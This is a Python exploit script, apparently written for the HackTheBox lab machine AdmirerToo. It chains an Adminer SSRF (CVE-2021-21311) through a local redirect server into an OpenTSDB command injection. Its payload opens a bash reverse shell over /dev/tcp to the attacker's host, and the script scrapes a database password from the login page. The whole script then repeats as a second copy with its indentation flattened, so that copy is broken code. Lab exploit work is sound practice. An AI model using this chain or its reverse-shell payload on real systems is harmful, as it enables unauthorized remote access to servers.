bitstuffing/login.py

## login.py
#!/usr/bin/python3
'''
This script was done to test and check all the things for AdmirerToo hard HachTheBox machine.

It will create an HTTP redirect server for Adminer remote machine to exploit login method,
using elastic driver to exploit SSRF, more information at:
https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery

Information about CVE-2021-21311 explotation at:
https://github.com/advisories/GHSA-x5r2-hj5c-8jx6

Data will be extracted from DIV <div class='error'> and displayed in info.log
Good responses will be stored in response.txt (all information)

Made by @bit with love for learning purpouses only.
'''
import requests
import html
#import threading
#choose multiprocessing because you could .terminate() subproccess and a thread with an infinite loop httpserver not
import multiprocessing
import sys
import time
from http.server import HTTPServer, BaseHTTPRequestHandler
import logging
logging.basicConfig(filename='info.log', encoding='utf-8', level=logging.DEBUG)

DOMAIN = 'db.admirer-gallery.htb'

#your IP and PORT for checks and a remote shell
REMOTE_IP = "10.10.14.101"
REMOTE_PORT = "39001"

#you will need to do a great nmap work with good 'filtered' results to check this port, if you check all ports you will be banned
port = 4242

#first, need to check this endpoint to extract OpenTSDB version
#uri = "api/version"
#second, if you want to check you're able to receive a ping from remote server and execution injection
#uri = "q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:http.stats.web.hits&o=&ylabel=&xrange=10:10&yrange=%5B33:system(%27ping+-c+1+"+REMOTE_IP+"%27)%5D&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"
#third, payload to remote console
uri = 'q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:http.stats.web.hits&o=&ylabel=&xrange=10:10&yrange=%5B33:system(%27%2Fbin%2Fbash+-c+%22%2Fbin%2Fbash+-i+%3E%26+%2Fdev%2Ftcp%2F'+REMOTE_IP+'%2F'+REMOTE_PORT+'+0%3E%261%22%27)%5D&wxh=1516x644&style=linespoint&baba=lala&grid=t&json'
print("testing port %s" % port)
print("testing uri %s" % uri)


'''
This class will open a local HTTP to redirect
'''
class Redirect(BaseHTTPRequestHandler):
	def do_GET(self):
	        self.send_response(302)
	        self.send_header('Location', "http://127.0.0.1:%s/%s" % (port,uri))
	        self.end_headers()

'''
Function to wrap local redirect server in a thread
'''
def thread_function(port):
	HTTPServer(("", port), Redirect).serve_forever()

#x = threading.Thread(target=thread_function, args=(80,))
x = multiprocessing.Process(target=thread_function, args=(80,))
x.start()
time.sleep(1) #if you close it in a looper to scan remote ports you will get a too many logins from WAF, and it's needed more than 1 second
headersDic = {
	"User-Agent" : "Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0",
	"Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
	"Accept-Language" : "en-US,en;q=0.5",
#	"Accept-Encoding" : "gzip, deflate",
	"Origin" : "http://%s" % DOMAIN
}

s = requests.Session()
r = s.get('http://%s' % DOMAIN, headers=headersDic)

#could extract data from first response but... I hardcoded that

#from login page, you could extract it from response but it's constant
#ADMIRER_PASSWORD = "1w4nn4b3adm1r3d2"
ADMIRER_PASSWORD = r.text
ADMIRER_PASSWORD = ADMIRER_PASSWORD[ADMIRER_PASSWORD.find('auth[password]" value="')+len('auth[password]" value="'):]
ADMIRER_PASSWORD = ADMIRER_PASSWORD[:ADMIRER_PASSWORD.find('"')]

postData = {
	"auth[driver]" : "elastic", #this driver do the magic
	"auth[server]" : REMOTE_IP,
	"auth[username]" : "admirer_ro",
	"auth[password]" : ADMIRER_PASSWORD,
	"auth[permanent]" : "1"
}

r2 = s.post('http://%s/' % DOMAIN,data=postData, headers=headersDic)

response = r2.text
response_original = response #store it for log purpousess
response = response[response.find("<div class='error'>")+len("<div class='error'>"):response.find("<form action='' method='post'>")].strip()
response = response[:len(response)-len('</div>')]

response = html.unescape(response)
if len(response) == 86: #play with right response size, so... it's discarted
	logging.debug('DISCARTED! port % - response: %s' % (port,response))
else:
	logging.info('GOOD port %s detected' % port)

	with open('response.txt', 'w') as f:
		f.write(response_original)

x.terminate()
	#!/usr/bin/python3
	'''
	This script was done to test and check all the things for AdmirerToo hard HachTheBox machine.

	It will create an HTTP redirect server for Adminer remote machine to exploit login method,
	using elastic driver to exploit SSRF, more information at:
	https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery

	Information about CVE-2021-21311 explotation at:
	https://github.com/advisories/GHSA-x5r2-hj5c-8jx6

	Data will be extracted from DIV <div class='error'> and displayed in info.log
	Good responses will be stored in response.txt (all information)

	Made by @bit with love for learning purpouses only.
	'''
	import requests
	import html
	#import threading
	#choose multiprocessing because you could .terminate() subproccess and a thread with an infinite loop httpserver not
	import multiprocessing
	import sys
	import time
	from http.server import HTTPServer, BaseHTTPRequestHandler
	import logging
	logging.basicConfig(filename='info.log', encoding='utf-8', level=logging.DEBUG)

	DOMAIN = 'db.admirer-gallery.htb'

	#your IP and PORT for checks and a remote shell
	REMOTE_IP = "10.10.14.101"
	REMOTE_PORT = "39001"

	#you will need to do a great nmap work with good 'filtered' results to check this port, if you check all ports you will be banned
	port = 4242

	#first, need to check this endpoint to extract OpenTSDB version
	#uri = "api/version"
	#second, if you want to check you're able to receive a ping from remote server and execution injection
	#uri = "q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:http.stats.web.hits&o=&ylabel=&xrange=10:10&yrange=%5B33:system(%27ping+-c+1+"+REMOTE_IP+"%27)%5D&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"
	#third, payload to remote console
	uri = 'q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:http.stats.web.hits&o=&ylabel=&xrange=10:10&yrange=%5B33:system(%27%2Fbin%2Fbash+-c+%22%2Fbin%2Fbash+-i+%3E%26+%2Fdev%2Ftcp%2F'+REMOTE_IP+'%2F'+REMOTE_PORT+'+0%3E%261%22%27)%5D&wxh=1516x644&style=linespoint&baba=lala&grid=t&json'
	print("testing port %s" % port)
	print("testing uri %s" % uri)


	'''
	This class will open a local HTTP to redirect
	'''
	class Redirect(BaseHTTPRequestHandler):
	def do_GET(self):
	self.send_response(302)
	self.send_header('Location', "http://127.0.0.1:%s/%s" % (port,uri))
	self.end_headers()

	'''
	Function to wrap local redirect server in a thread
	'''
	def thread_function(port):
	HTTPServer(("", port), Redirect).serve_forever()

	#x = threading.Thread(target=thread_function, args=(80,))
	x = multiprocessing.Process(target=thread_function, args=(80,))
	x.start()
	time.sleep(1) #if you close it in a looper to scan remote ports you will get a too many logins from WAF, and it's needed more than 1 second
	headersDic = {
	"User-Agent" : "Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0",
	"Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8",
	"Accept-Language" : "en-US,en;q=0.5",
	# "Accept-Encoding" : "gzip, deflate",
	"Origin" : "http://%s" % DOMAIN
	}

	s = requests.Session()
	r = s.get('http://%s' % DOMAIN, headers=headersDic)

	#could extract data from first response but... I hardcoded that

	#from login page, you could extract it from response but it's constant
	#ADMIRER_PASSWORD = "1w4nn4b3adm1r3d2"
	ADMIRER_PASSWORD = r.text
	ADMIRER_PASSWORD = ADMIRER_PASSWORD[ADMIRER_PASSWORD.find('auth[password]" value="')+len('auth[password]" value="'):]
	ADMIRER_PASSWORD = ADMIRER_PASSWORD[:ADMIRER_PASSWORD.find('"')]

	postData = {
	"auth[driver]" : "elastic", #this driver do the magic
	"auth[server]" : REMOTE_IP,
	"auth[username]" : "admirer_ro",
	"auth[password]" : ADMIRER_PASSWORD,
	"auth[permanent]" : "1"
	}

	r2 = s.post('http://%s/' % DOMAIN,data=postData, headers=headersDic)

	response = r2.text
	response_original = response #store it for log purpousess
	response = response[response.find("<div class='error'>")+len("<div class='error'>"):response.find("<form action='' method='post'>")].strip()
	response = response[:len(response)-len('</div>')]

	response = html.unescape(response)
	if len(response) == 86: #play with right response size, so... it's discarted
	logging.debug('DISCARTED! port % - response: %s' % (port,response))
	else:
	logging.info('GOOD port %s detected' % port)

	with open('response.txt', 'w') as f:
	f.write(response_original)

	x.terminate()